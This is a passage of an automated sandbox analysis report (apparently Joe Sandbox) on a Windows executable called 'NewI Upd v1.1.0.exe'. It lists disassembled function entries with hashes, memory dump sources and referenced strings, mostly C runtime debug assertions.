                                                                                  • Opcode Fuzzy Hash: b2cc1a3b884791a097613dd928cd760dccae64a3ec2097dd97ae31fec544337d
                                                                                  • Instruction Fuzzy Hash: F541257450C7C18AD3258B28889879BBFD1AB9A328F485B5CE4E94B3D2C7B98405CB57
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitVariant
                                                                                  • String ID: !$#$%$&$'$Q$S$U$W$Y$[$]$_
                                                                                  • API String ID: 1927566239-3921750754
                                                                                  • Opcode ID: dfb06baab381fb4b6b2c2671629a1003674da17e5271b1870dfb0cf66c3bcced
                                                                                  • Instruction ID: cea9bca1cad97a37013d5375c41eeffecc952c046f5a0125e7bb360937c1a7c0
                                                                                  • Opcode Fuzzy Hash: dfb06baab381fb4b6b2c2671629a1003674da17e5271b1870dfb0cf66c3bcced
                                                                                  • Instruction Fuzzy Hash: E641267050C7C18ED3258B28888875BBFD16B9A228F485B9DF4E94B3D2C3B98505CB57
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearInit
                                                                                  • String ID: $"$$$&$($*$,$.$8$<$>
                                                                                  • API String ID: 2610073882-253838457
                                                                                  • Opcode ID: e343c5626c0b20c09b7ed7b8af474be22a20b4315969390f4c7b0b42aea5aa09
                                                                                  • Instruction ID: 8be586371eeeef64585bfa29eccbbd651e4148937e201bdf883ccd51c2959361
                                                                                  • Opcode Fuzzy Hash: e343c5626c0b20c09b7ed7b8af474be22a20b4315969390f4c7b0b42aea5aa09
                                                                                  • Instruction Fuzzy Hash: AB51642260C7D18AD331CA3C894938BBFD16BE7220F494BADD4E8973D6D6745506C793
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strlen
                                                                                  • String ID: %ls$0$__acrt_fp_strflt_to_string$buffer != nullptr$buffer_count > 0$buffer_count > static_cast<size_t>((digits > 0 ? digits : 0) + 1)$minkernel\crts\ucrt\src\appcrt\convert\_fptostr.cpp$pflt != nullptr
                                                                                  • API String ID: 4218353326-3579526835
                                                                                  • Opcode ID: a0aaff7e91d8f9ac613244c66ab3c179169c432cf1512787b505437192cd1fad
                                                                                  • Instruction ID: 89304b9e7e64062d6eedd91aa7cb913b6d5341289060788ab693aa6b11ccd7bb
                                                                                  • Opcode Fuzzy Hash: a0aaff7e91d8f9ac613244c66ab3c179169c432cf1512787b505437192cd1fad
                                                                                  • Instruction Fuzzy Hash: 4CB18170E44208EFEB24DF98CC41BEE7BB0FB55714F144159E815AB382D3799A41CB91
                                                                                  APIs
                                                                                  • __aligned_msize.LIBCMTD ref: 0089D5DF
                                                                                  • __invoke_watson_if_error.LIBCMTD ref: 0089D5FE
                                                                                  Strings
                                                                                  • e+000, xrefs: 0089D5D2
                                                                                  • %ls, xrefs: 0089D489
                                                                                  • strcpy_s( p, result_buffer_count == (static_cast<size_t>(-1)) ? result_buffer_count : result_buffer_count - (p - result_buffer), ", xrefs: 0089D5F8
                                                                                  • d, xrefs: 0089D65D
                                                                                  • minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp, xrefs: 0089D492, 0089D4CA, 0089D5EE
                                                                                  • result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1), xrefs: 0089D484, 0089D4D4
                                                                                  • fp_format_e_internal, xrefs: 0089D4CF, 0089D5F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aligned_msize__invoke_watson_if_error
                                                                                  • String ID: %ls$d$e+000$fp_format_e_internal$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1)$strcpy_s( p, result_buffer_count == (static_cast<size_t>(-1)) ? result_buffer_count : result_buffer_count - (p - result_buffer), "
                                                                                  • API String ID: 4254006664-2583523412
                                                                                  • Opcode ID: c2313f491fc83a8fb76754bc161b5c67a5fa649ee7ce15c5dbdbb2cf2c949538
                                                                                  • Instruction ID: 203c358678982c8e218814dc3de4701c1462b6b666faf004190691e8c90ec6c9
                                                                                  • Opcode Fuzzy Hash: c2313f491fc83a8fb76754bc161b5c67a5fa649ee7ce15c5dbdbb2cf2c949538
                                                                                  • Instruction Fuzzy Hash: 81A14D70A04248EFCF04DF98C991BADBBB1FF89308F288199E415AB391D774AE40DB55
                                                                                  APIs
                                                                                  • __wcstombs_l.LIBCMTD ref: 00899ECF
                                                                                  • __MarkAllocaS.LIBCMTD ref: 00899ED8
                                                                                    • Part of subcall function 00898480: MultiByteToWideChar.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,?), ref: 008984B3
                                                                                  • std::_Timevec::_Timevec.LIBCPMTD ref: 00899EF3
                                                                                  • std::_Timevec::_Timevec.LIBCPMTD ref: 00899EFE
                                                                                  • std::_Mutex::_Lock.LIBCPMTD ref: 00899F19
                                                                                  • std::_Mutex::_Lock.LIBCPMTD ref: 00899F7D
                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,00000000), ref: 00899FA4
                                                                                  • std::_Mutex::_Lock.LIBCPMTD ref: 00899FB0
                                                                                  Strings
                                                                                  • minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp, xrefs: 00899EB9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: std::_$LockMutex::_$TimevecTimevec::_$AllocaByteCharMarkMultiStringTypeWide__wcstombs_l
                                                                                  • String ID: minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp
                                                                                  • API String ID: 2378836076-24854585
                                                                                  • Opcode ID: 208ebfb34313f0d84a896e6ccc529d171d1fcbb90ffae077369d0fd8b7cce06a
                                                                                  • Instruction ID: c568190689e4979268b08a01c4b972c90616d434612057a945402844c73f718f
                                                                                  • Opcode Fuzzy Hash: 208ebfb34313f0d84a896e6ccc529d171d1fcbb90ffae077369d0fd8b7cce06a
                                                                                  • Instruction Fuzzy Hash: 9C5117B1910209EBCF04FF98D996AEEB7B8FF54304F544158F505E7281EB70AA04CBA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: %ls$Damage before 0x%p which was allocated by aligned routine$IS_2_POW_N(alignment)$The block at 0x%p was not allocated by _aligned routines, use realloc()$_aligned_offset_realloc_dbg$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$offset == 0 || offset < size
                                                                                  • API String ID: 0-3113323069
                                                                                  • Opcode ID: e93c6cf6b19ed1aaefe7c934726236cc235743d77832f195251f079236f578c9
                                                                                  • Instruction ID: 25c01673c6e3159159c14134e109e5c2bfd4add816f6c2ad31f92de3f6169500
                                                                                  • Opcode Fuzzy Hash: e93c6cf6b19ed1aaefe7c934726236cc235743d77832f195251f079236f578c9
                                                                                  • Instruction Fuzzy Hash: B7918F74A00209AFDF14EF98DC46BAE77B1FB44304F148518F915EB382E675AA50CBA5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: %ls$C:\Users\user\Desktop\NewI Upd v1.1.0.exe$common_configure_argv$minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp$mode == _crt_argv_expanded_arguments || mode == _crt_argv_unexpanded_arguments
                                                                                  • API String ID: 0-269975004
                                                                                  • Opcode ID: c61edd902e7e0398847b843957b7e803bfd5c567f4810b17b5655e16c1ce10e2
                                                                                  • Instruction ID: 63063792e75fbbda074fc4bdfc0931f0e06de0874f20c46b4e39e554491156d2
                                                                                  • Opcode Fuzzy Hash: c61edd902e7e0398847b843957b7e803bfd5c567f4810b17b5655e16c1ce10e2
                                                                                  • Instruction Fuzzy Hash: 6C812CB1D10218DBDB18FF94D896BEEB7B4FF54304F104529E502EB292EB749904CBA2
                                                                                  APIs
                                                                                  • ___except_validate_context_record.LIBVCRUNTIMED ref: 00880AEA
                                                                                    • Part of subcall function 0087EA00: __guard_icall_checks_enforced.LIBCMTD ref: 0087EA06
                                                                                  • ___vcrt_getptd.LIBVCRUNTIMED ref: 00880AF2
                                                                                  • __FrameHandler3::isEHs.LIBVCRUNTIMED ref: 00880B2A
                                                                                  • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIMED ref: 00880B74
                                                                                  • _Smanip.LIBCPMTD ref: 00880B8F
                                                                                  • __FrameHandler3::isNoExcept.LIBVCRUNTIMED ref: 00880BDE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Frame$Handler3::is$EmptyExceptHandler3::SmanipStateUnwind___except_validate_context_record___vcrt_getptd__guard_icall_checks_enforced
                                                                                  • String ID: csm$csm
                                                                                  • API String ID: 2671830719-3733052814
                                                                                  • Opcode ID: c7f196789b9711e7b574eb45eb70aa5e47d8b602455095f0624435cc4699f567
                                                                                  • Instruction ID: d5d5432c134a7b083b9969d74417e91dff5d3cf83674d4d445dc79dd9e22854e
                                                                                  • Opcode Fuzzy Hash: c7f196789b9711e7b574eb45eb70aa5e47d8b602455095f0624435cc4699f567
                                                                                  • Instruction Fuzzy Hash: 9C515EB5A00109ABCF44EF98D885AAF77AAFF58344F048558F909CB241D730EE56CBD2
                                                                                  APIs
                                                                                  • ___vcrt_getptd.LIBVCRUNTIMED ref: 00880877
                                                                                  • ___vcrt_getptd.LIBVCRUNTIMED ref: 00880882
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___vcrt_getptd
                                                                                  • String ID: MOC$RCC
                                                                                  • API String ID: 984050374-2084237596
                                                                                  • Opcode ID: b6bea7ed29d0944c9f5526d8bc182a41f4efdf1a574837bf14cd72f97268691d
                                                                                  • Instruction ID: 57e226e0284801246d3d9390eaa540eee58db2f51badf809211be974ac10176b
                                                                                  • Opcode Fuzzy Hash: b6bea7ed29d0944c9f5526d8bc182a41f4efdf1a574837bf14cd72f97268691d
                                                                                  • Instruction Fuzzy Hash: A951FA71900109EBDB44EE98CC91EEE77B9FF48304F148259F91AE7296DA30AD45CFA1
                                                                                  APIs
                                                                                  • std::_Timevec::_Timevec.LIBCPMTD ref: 0089628A
                                                                                  • __invoke_watson_if_error.LIBCMTD ref: 008962CF
                                                                                  • __invoke_watson_if_error.LIBCMTD ref: 00896320
                                                                                  Strings
                                                                                  • minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp, xrefs: 00896271
                                                                                  • copy_and_add_argument_to_buffer, xrefs: 008962AC, 008962FD
                                                                                  • traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count), xrefs: 00896302
                                                                                  • traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length), xrefs: 008962B1
                                                                                  • minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp, xrefs: 008962A7, 008962F8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: __invoke_watson_if_error$TimevecTimevec::_std::_
                                                                                  • String ID: copy_and_add_argument_to_buffer$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count)$traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length)
                                                                                  • API String ID: 3608294869-1477255430
                                                                                  • Opcode ID: 0e0a9d81a5b160c48c1f1f35fca9504566791d4c775736101fb7d8d8118550e1
                                                                                  • Instruction ID: b8ee29dec0b21474882277c6fd8b74d559ebd5200bfcb6afdf5348e5ab580ce7
                                                                                  • Opcode Fuzzy Hash: 0e0a9d81a5b160c48c1f1f35fca9504566791d4c775736101fb7d8d8118550e1
                                                                                  • Instruction Fuzzy Hash: 74311CB5D40209ABCB14FFA4CC53EEE7778FF10700F14465AB526A6282EB74A7148B91
                                                                                  APIs
                                                                                  • std::_Timevec::_Timevec.LIBCPMTD ref: 00882E75
                                                                                  • std::_Timevec::_Timevec.LIBCPMTD ref: 00882EFE
                                                                                  Strings
                                                                                  • create_environment, xrefs: 00882F59
                                                                                  • traits::tcscpy_s(variable.get(), required_count, source_it), xrefs: 00882F5E
                                                                                  • minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp, xrefs: 00882E59, 00882EE5
                                                                                  • minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp, xrefs: 00882F54
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: TimevecTimevec::_std::_
                                                                                  • String ID: create_environment$minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp$minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp$traits::tcscpy_s(variable.get(), required_count, source_it)
                                                                                  • API String ID: 4219598475-2967542164
                                                                                  • Opcode ID: 6abb051a83f1d49543320942b66c9964822b28b095f1502189a26f559d992f64
                                                                                  • Instruction ID: 2b09332a279d64fdafc56e9112722940130ad733df7c75117c456eb39caa41aa
                                                                                  • Opcode Fuzzy Hash: 6abb051a83f1d49543320942b66c9964822b28b095f1502189a26f559d992f64
                                                                                  • Instruction Fuzzy Hash: 0C4130B1D00219ABCB18FB98C892EEEB7B4FF50304F504159E502F6292EF30AB54DB91
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: _swprintf
                                                                                  • String ID: $ Data: <%s> %s$%.2X $(*_errno())$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$print_block_data
                                                                                  • API String ID: 589789837-578187083
                                                                                  • Opcode ID: 8ef759ec280c9cd189d0111f6264ef3334288ffd38a8db11444eccefa67f4b60
                                                                                  • Instruction ID: 6db6056c7b18ad71a2ad6d6ce0a993e18824910acadcfd0bdeb98cfddc5aa4b1
                                                                                  • Opcode Fuzzy Hash: 8ef759ec280c9cd189d0111f6264ef3334288ffd38a8db11444eccefa67f4b60
                                                                                  • Instruction Fuzzy Hash: AD419D70904248DBDF04EFE8C952BAEBBB5FF44704F608158E506AF386DA75AA04CB91
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(0089ABB9,00000000,00000800,?,?,0089ABB9,00000000), ref: 0089ACD1
                                                                                  • GetLastError.KERNEL32(?,?,0089ABB9), ref: 0089ACE5
                                                                                  • _wcsncmp.LIBCMTD ref: 0089ACFB
                                                                                  • _wcsncmp.LIBCMTD ref: 0089AD12
                                                                                  • LoadLibraryExW.KERNEL32(0089ABB9,00000000,00000000,?,?,?,?,0089ABB9), ref: 0089AD26
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad_wcsncmp$ErrorLast
                                                                                  • String ID: api-ms-$ext-ms-
                                                                                  • API String ID: 180994465-537541572
                                                                                  • Opcode ID: dbe2c6b5a900dd08a8f10e04abad919db934327f5d9da005299eed53bab4dcc0
                                                                                  • Instruction ID: 9412a10f5bdcceef03c24b70399a6eea04657bacc52a5cdbccdcef6876663a84
                                                                                  • Opcode Fuzzy Hash: dbe2c6b5a900dd08a8f10e04abad919db934327f5d9da005299eed53bab4dcc0
                                                                                  • Instruction Fuzzy Hash: 6501867564020CF7EF14ABA0DD0AF6A7B64FB04705F148450FE04DA682DA74EA00D7D1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: %ls$_write_nolock$buffer != nullptr$buffer_size % 2 == 0$minkernel\crts\ucrt\src\appcrt\lowio\write.cpp
                                                                                  • API String ID: 0-1420694404
                                                                                  • Opcode ID: 0fbae220d37d484271dcd1151245f9f4dc9d405f67e64bf8bdcd103fd9944fc9
                                                                                  • Instruction ID: ba52743d6142dfb46cf8e6ddceda8a28cba3b6eb63a4dee4416a24a9cb8e8582
                                                                                  • Opcode Fuzzy Hash: 0fbae220d37d484271dcd1151245f9f4dc9d405f67e64bf8bdcd103fd9944fc9
                                                                                  • Instruction Fuzzy Hash: 0DF12870E00218DFEB14DF98D895BAEBBB1FF89300F148559E519AB392DB709940CFA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: %ls$_wcstombs_l_helper$minkernel\crts\ucrt\src\appcrt\convert\wcstombs.cpp$pwcs != nullptr
                                                                                  • API String ID: 0-287901994
                                                                                  • Opcode ID: 6a17fd1d6d77bb5696c95b25264eaedf1d915ec4013de4173c9e869b630f13b3
                                                                                  • Instruction ID: c48ea304ad44d9e90b317f9873ee88ce3d29fe71c09df5ce605d435eb46ac5df
                                                                                  • Opcode Fuzzy Hash: 6a17fd1d6d77bb5696c95b25264eaedf1d915ec4013de4173c9e869b630f13b3
                                                                                  • Instruction Fuzzy Hash: 31F14C71A00209DFEF14DF98C891BBEBBB1FF4A304F248518E521AB685E770AD51CB51
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
